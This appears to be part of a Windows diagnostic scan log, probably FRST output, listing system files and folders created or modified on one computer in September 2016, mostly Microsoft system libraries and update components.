    2016-09-14 01:09 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntkrnlpa.exe
    2016-09-14 01:09 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
    2016-09-14 01:09 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
    2016-09-14 01:09 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
    2016-09-14 01:09 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\conhost.exe
    2016-09-14 01:09 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
    2016-09-14 01:09 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
    2016-09-14 01:09 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
    2016-09-14 01:09 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2016-09-14 01:09 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
    2016-09-14 01:09 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
    2016-09-14 01:09 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
    2016-09-14 01:09 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
    2016-09-14 01:09 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptnet.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptnet.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
    2016-09-14 01:09 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
    2016-09-14 01:09 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
    2016-09-14 01:09 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
    2016-09-14 01:09 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
    2016-09-14 01:09 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
    2016-09-14 01:09 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
    2016-09-14 01:09 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
    2016-09-13 21:45 - 2016-09-13 21:48 - 00000000 ____D C:\aa Samsung Master accum
    2016-09-13 01:39 - 2016-07-08 11:32 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
    2016-09-13 01:39 - 2016-07-08 11:16 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
    2016-09-12 21:48 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
    2016-09-12 21:48 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetpp.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetppui.dll
    2016-09-12 21:48 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
    2016-09-12 21:48 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnpinst.exe
    2016-09-12 21:48 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
    2016-09-12 21:48 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
    2016-09-12 19:48 - 2016-09-17 07:41 - 00000000 ____D C:\aa Canon 600D - T3i Master accum
    2016-09-12 19:47 - 2016-09-12 19:47 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-18 11:44 - 2016-01-21 18:10 - 00001461 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2016-09-18 11:37 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
